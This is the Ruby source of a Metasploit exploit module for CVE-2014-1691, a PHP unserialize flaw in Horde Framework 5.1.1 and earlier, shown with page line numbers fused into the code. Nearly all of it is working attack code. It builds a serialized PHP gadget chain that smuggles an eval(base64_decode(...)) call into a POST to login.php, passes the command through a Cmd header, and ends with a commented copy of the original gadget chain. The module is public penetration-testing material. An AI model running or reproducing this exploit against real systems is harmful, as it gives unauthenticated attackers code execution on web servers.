Path: blob/master/modules/exploits/unix/webapp/horde_unserialize_exec.rb
19720 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Horde Framework Unserialize PHP Code Execution',15'Description' => %q{16This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be17abused to allow unauthenticated users to execute arbitrary code with the permissions of18the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.19The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean20class to reach a dangerous call_user_func() call in the Horde_Prefs class.21},22'Author' => [23'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)24'juan vazquez' # Metasploit module25],26'License' => MSF_LICENSE,27'References' => [28[ 'CVE', '2014-1691' ],29[ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],30[ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],31[ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]32],33'Privileged' => false,34'Platform' => ['php'],35'Arch' => ARCH_PHP,36'Payload' => {37'DisableNops' => true38},39'Targets' => [ ['Horde 5', {}], ],40'DefaultTarget' => 0,41'DisclosureDate' => '2013-06-27',42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])53]54)55end5657def check58flag = rand_text_alpha(rand(10) + 20)59res = send_request_exploit("print #{flag};die;")60if res and res.body and res.body.to_s =~ /#{flag}/61return Exploit::CheckCode::Vulnerable62end6364return Exploit::CheckCode::Safe65end6667def exploit68print_status("Testing injection...")69unless check == Exploit::CheckCode::Vulnerable70fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")71end7273print_status("Exploiting the unserialize()...")74send_request_exploit(payload.encoded)75end7677def send_request_exploit(p)78php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"7980payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"81payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"82payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"83payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"84payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"8586send_request_cgi(87{88'uri' => normalize_uri(target_uri.path.to_s, "login.php"),89'method' => 'POST',90'vars_post' => {91'_formvars' => payload_serialized92},93'headers' => {94'Cmd' => Rex::Text.encode_base64(p)95}96}97)98end99end100101=begin102103PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection104105class Horde_Config106{107protected $_oldConfig = "phpinfo();die;";108}109110class Horde_Prefs_Scope111{112protected $_prefs = array(1);113}114115class Horde_Prefs116{117protected $_opts, $_scopes;118119function __construct()120{121$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');122$this->_scopes['horde'] = new Horde_Prefs_Scope;123}124}125126class Horde_Prefs_Identity127{128protected $_prefs, $_prefnames;129130function __construct()131{132$this->_prefs = new Horde_Prefs;133$this->_prefnames['identities'] = 0;134}135}136137class Horde_Kolab_Server_Decorator_Clean138{139private $_server, $_added = array(1);140141function __construct()142{143$this->_server = new Horde_Prefs_Identity;144}145}146147$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);148149=end150151152